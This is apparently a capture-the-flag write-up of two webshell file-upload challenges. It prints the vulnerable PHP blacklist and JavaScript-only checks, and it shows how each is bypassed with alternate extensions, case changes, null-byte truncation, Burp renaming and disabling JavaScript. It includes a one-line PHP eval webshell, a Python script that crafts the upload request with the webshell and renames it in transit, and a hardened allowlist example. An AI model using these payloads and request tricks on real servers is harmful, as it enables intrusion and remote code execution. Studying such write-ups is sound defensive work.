1.5 Webshell File Upload Vulnerability Analysis Traceability (1~4)

Source: Internet
Author: User

Webshell File Upload Vulnerability Analysis Traceability (first question)

Let's take a look at the basic page:

Upload 1.php: rejected, no surprise there.

Upload 1.png: accepted.

Inspecting the page elements shows no front-end (JavaScript) validation, so the check has to be server-side.

That leaves intercepting the request with Burp. Rename 1.php to "1.php .png" (a space before .png), upload it, capture the request, and in the hex view change that 0x20 (space) byte to 0x00 so the server sees 1.php\0.png. Keep in mind that this null-byte truncation only works against PHP older than 5.3.4; newer versions reject file paths containing a NUL byte.

After reading someone else's write-up (WP), it turned out to be a plain blacklist bypass: just upload 1.php3, 1.php4 or 1.php5. The server only filters the exact string ".php", an easy thing to overlook.

Connect to the uploaded file with Chopper and it's done.

Come here, let's take a look at the source code:

index.php

<!doctype html>
<html>
<body>
<div class="site-wrapper">
  <form class="form-signin" action="upload.php" method="post" enctype="multipart/form-data" name="upload">
    <input class="form-control" type="file" name="upfile"/>
    <input type="submit" name="submit" value="Upload file"/>
  </form>
</div>
</body>
</html>

upload.php

<?php
// File upload vulnerability demo script: server-side extension validation
header("Content-Type: text/html; charset=utf-8");
error_reporting(0);
$uploaddir = 'uploads/';
if (isset($_POST['submit'])) {
    if (file_exists($uploaddir)) {
        // Blacklist: only these exact, case-sensitive extensions are rejected
        $deny_ext = array('.asp', '.php', '.aspx', '.jsp');
        // echo strrchr($_FILES['upfile']['name'], '.');
        $file_ext = strrchr($_FILES['upfile']['name'], '.');   // everything from the last '.'
        // echo $file_ext;
        if (!in_array($file_ext, $deny_ext)) {
            // The client-supplied name is reused verbatim as the stored name
            if (move_uploaded_file($_FILES['upfile']['tmp_name'], $uploaddir . '/' . $_FILES['upfile']['name'])) {
                echo 'File uploaded successfully, saved in: ' . $uploaddir . $_FILES['upfile']['name'] . "\n";
            }
        } else {
            echo 'This file is not allowed to be uploaded' . "\n";
        }
    } else {
        exit($uploaddir . ' folder does not exist, please create it manually');
    }
    // print_r($_FILES);
}
?>

It uses a blacklist and filters out ".php", but PHP has other extensions: .php3, .php4 and .php5 (and .phtml) are handed to the PHP interpreter wherever the server's Apache handler configuration maps them, so they are parsed just like .php. On top of that, in_array() compares case-sensitively, so 1.PHP or 1.Php also slips through, and the upload keeps the client-supplied filename, so the attacker chooses the final path.
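As an added example (this is not code from the write-up or from the challenge), here is a Python re-implementation of the blacklist check in upload.php next to a hardened allowlist version, run over a constructed set of candidate filenames so you can see exactly which names the blacklist lets through. The allowlist, the NUL check and the server-generated stored name are my additions for the hardened variant; the challenge does none of them.

```python
import os
import secrets

# Same list as $deny_ext in the write-up's upload.php.
DENY_EXT = ['.asp', '.php', '.aspx', '.jsp']

# Allowlist used by the hardened version (assumption: the application only
# needs to accept images).
ALLOW_EXT = {'.gif', '.jpg', '.jpeg', '.png'}


def php_strrchr(haystack, needle):
    """PHP strrchr(): substring from the LAST occurrence of needle, or False."""
    idx = haystack.rfind(needle)
    return haystack[idx:] if idx != -1 else False


def vulnerable_allows(filename):
    """Mirror of upload.php: reject only if the exact, case-sensitive last
    extension is in the blacklist (PHP in_array() compares case-sensitively)."""
    file_ext = php_strrchr(filename, '.')
    return file_ext not in DENY_EXT


def hardened_allows(filename):
    """Allowlist on a lowercased, normalised extension; anything unexpected
    (no extension, embedded NUL, unknown extension) is rejected."""
    if '\x00' in filename:
        return False
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    return ext in ALLOW_EXT


def hardened_stored_name(filename):
    """Never reuse the client's name: keep only the validated extension and
    generate the base name server-side, so the uploader cannot pick the path."""
    if not hardened_allows(filename):
        raise ValueError('extension not allowed')
    ext = os.path.splitext(filename)[1].lower()
    return secrets.token_hex(16) + ext


# Constructed candidates: the ones from the write-up plus the obvious variants.
CANDIDATES = [
    '1.php',            # blocked by the blacklist
    '1.php3',           # the bypass the write-up used
    '1.PHP',            # in_array() is case-sensitive
    '1.phtml',          # another extension Apache commonly maps to PHP
    '1.php\x00.png',    # null-byte trick: strrchr() only sees ".png"
    '1.png',
]


def classify(candidates=CANDIDATES):
    """Return {filename: (passes_blacklist, passes_allowlist)}."""
    return {name: (vulnerable_allows(name), hardened_allows(name)) for name in candidates}


if __name__ == '__main__':
    for name, (vuln, hard) in classify().items():
        print(f'{name!r:20} blacklist={vuln!s:5} allowlist={hard}')
```

Whether 1.php\0.png then actually lands on disk as 1.php depends on the PHP version (move_uploaded_file() rejects NUL in paths from 5.3.4 on); the point here is that the extension check itself never sees the .php part.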

Webshell File Upload Vulnerability Analysis Traceability (second question)

This time we upload 1.php3:

Then 1.png:

Then 1.php renamed to 1.php.jpg:

Let's look at the page source:

<!doctype html>
<html>
<head>
<script>
// Client-side extension check: only names ending in extArray pass
var extArray = new Array(".gif", ".jpg", ".png");
function LimitAttach(form, file) {
    allowSubmit = false;
    if (!file) return;
    // strip a Windows-style path prefix
    while (file.indexOf("\\") != -1)
        file = file.slice(file.indexOf("\\") + 1);
    // everything from the FIRST dot, lower-cased
    ext = file.slice(file.indexOf(".")).toLowerCase();
    for (var i = 0; i < extArray.length; i++) {
        if (extArray[i] == ext) {
            allowSubmit = true;
            break;
        }
    }
    if (allowSubmit)
        form.submit();
    else
        alert("Sorry, you can only upload files in the following format: " + (extArray.join("  ")) + "\nPlease re-select an eligible file and upload again.");
    return false;
}
</script>
</head>
<body>
<div class="site-wrapper">
  <form class="form-signin" action="upload.php" method="post" enctype="multipart/form-data" name="upload">
    <input class="form-control" type="file" name="uploadfile"/>
    <input type="submit" name="submit" value="Upload file" onclick="return LimitAttach(this.form, this.form.uploadfile.value)"/>
  </form>
</div>
</body>
</html>

So there is JavaScript validation on the front end that only lets image extensions through. The check runs entirely in the browser, so there are two ways around it:

First: rename the one-line webshell 1.php to 1.jpg so it passes the JavaScript check, intercept the upload with Burp Suite and change the filename in the request back to 1.php. Once the upload succeeds, connect with Chopper to get a shell and find the key.

Second: in Firefox (this is Firefox-specific), open about:config, search for javascript.enabled and toggle it to false. With JavaScript disabled the front-end check never runs, so write the one-line webshell <?php eval($_POST['123']); ?> as 1.php and upload it directly; the response gives the path uploads/1.php, and Chopper connects to that.
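As an added example (not code from the write-up or the challenge), here is a Python model of the page's LimitAttach() check alongside the multipart/form-data request the form sends, with the Burp step done programmatically: only the filename= parameter is edited, which is the field PHP uses to fill $_FILES['uploadfile']['name']. The field names uploadfile and submit come from the page's form and the webshell body is the one-liner from the write-up; the boundary string and the Content-Type the browser sends for a .jpg are assumptions.

```python
import re

EXT_ARRAY = ['.gif', '.jpg', '.png']          # extArray in the page's script
BOUNDARY = '----WebKitFormBoundaryExample'     # assumed; any unique token works
WEBSHELL = b"<?php eval($_POST['123']); ?>"   # the one-liner from the write-up


def client_allows(path):
    """Replica of LimitAttach(): strip a Windows-style path (browsers report
    C:\\fakepath\\name for a file input), take everything from the FIRST dot,
    lower-case it and compare against extArray. Note that 1.php.jpg fails
    here because ext becomes '.php.jpg'."""
    if not path:
        return False
    name = path
    while '\\' in name:
        name = name[name.index('\\') + 1:]
    if '.' not in name:
        return False          # JS slice(-1) yields one char, never in extArray
    ext = name[name.index('.'):].lower()
    return ext in EXT_ARRAY


def build_upload(filename, content, boundary=BOUNDARY):
    """multipart/form-data body for the page's form: field 'uploadfile' with
    the file, plus the 'submit' field that upload.php checks with isset()."""
    b = boundary.encode()
    parts = [
        b'--' + b,
        b'Content-Disposition: form-data; name="uploadfile"; filename="' + filename.encode() + b'"',
        b'Content-Type: image/jpeg',   # assumed: what a browser sends for a .jpg
        b'',
        content,
        b'--' + b,
        b'Content-Disposition: form-data; name="submit"',
        b'',
        b'Upload file',
        b'--' + b + b'--',
        b'',
    ]
    return 'multipart/form-data; boundary=' + boundary, b'\r\n'.join(parts)


def rename_in_body(body, old, new):
    """The Burp edit: change only the filename= parameter. The server never
    sees the name the JavaScript approved, only what is in this header."""
    old_hdr = b'filename="' + old.encode() + b'"'
    new_hdr = b'filename="' + new.encode() + b'"'
    if old_hdr not in body:
        raise ValueError('filename parameter not found')
    return body.replace(old_hdr, new_hdr, 1)


def filename_in_body(body):
    """The filename the server-side script would read from the request."""
    m = re.search(rb'filename="([^"]*)"', body)
    return m.group(1).decode() if m else None


def craft(local_name='1.jpg', server_name='1.php'):
    """Pick a name the JS accepts, build the request the browser would send,
    then rename the file in transit. Returns (content_type, body)."""
    if not client_allows(local_name):
        raise ValueError(f'{local_name} would be blocked before the request is sent')
    ctype, body = build_upload(local_name, WEBSHELL)
    return ctype, rename_in_body(body, local_name, server_name)


if __name__ == '__main__':
    ctype, body = craft()
    print(ctype)
    print(body.decode())
```

The same body can be replayed with any HTTP client; the point is that the only thing standing between the attacker and uploads/1.php is a string comparison that runs on the attacker's own machine.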

Webshell File Upload Vulnerability Analysis Traceability (third question)

Webshell File Upload Vulnerability Analysis Traceability (fourth question)
